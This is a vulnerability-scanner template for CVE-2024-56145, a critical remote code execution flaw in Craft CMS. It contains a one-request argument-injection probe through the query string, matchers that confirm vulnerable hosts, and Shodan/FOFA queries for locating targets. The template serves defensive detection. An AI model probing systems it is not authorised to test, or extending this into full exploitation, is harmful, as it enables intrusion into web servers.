This template identifies a critical Remote Code Execution (RCE) vulnerability in Craft CMS, identified as GHSA-2p6p-9rc9-62j9.
The vulnerability exists due to improper handling of the `--templatesPath` query parameter, allowing attackers to execute arbitrary code by referencing malicious Twig templates.
PoC
id: CVE-2024-56145
info:
name: Craft CMS - Remote Code Execution via Template Path Manipulation
author: jackhax
severity: critical
description: |
This template identifies a critical Remote Code Execution (RCE) vulnerability in Craft CMS, identified as GHSA-2p6p-9rc9-62j9.
The vulnerability exists due to improper handling of the `--templatesPath` query parameter, allowing attackers to execute arbitrary code by referencing malicious Twig templates.
impact: |
Successful exploitation of this vulnerability could allow an unauthenticated attacker to perform remote code execution.
remediation: |
Upgrade CraftCMS to either >5.5.2 or >4.13.2 or >3.9.14. Or If you can't upgrade yet, and register_argc_argv is enabled, you can disable it to mitigate the issue.
reference:
- https://github.com/advisories/GHSA-2p6p-9rc9-62j9
- https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
- https://github.com/Chocapikk/CVE-2024-56145
- https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3
- https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cvss-score: 9.3
cve-id: CVE-2024-56145
cwe-id: CWE-94
epss-score: 0.97446
epss-percentile: 0.99897
cpe: cpe:2.3:a:craftcms:craft:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: craftcms
product: cms
shodan-query:
- http.html:"craftcms"
- http.favicon.hash:"-47932290"
fofa-query:
- icon_hash=-47932290
- body=craftcms
publicwww-query: craftcms
tags: cve,cve2024,rce,craftcms,ssti,kev,vkev,vuln
variables:
nonce: "{{rand_int(1000000000,9999999999)}}"
http:
- raw:
- |
GET ?--configPath=/nuclei_test/{{nonce}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{nonce}}'
- 'mkdir()'
- 'Permission denied'
- 'No such file or directory'
condition: and
- type: status
status:
- 503
# digest: 4b0a00483046022100a0a80a80959bef92e4f310727b5d1fb6d27c77416d5b488352568bf04c42b80c02210097df5d06abeb33fb73ff7573517d3db89856f54c53498862174a39e2bd1f8271:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.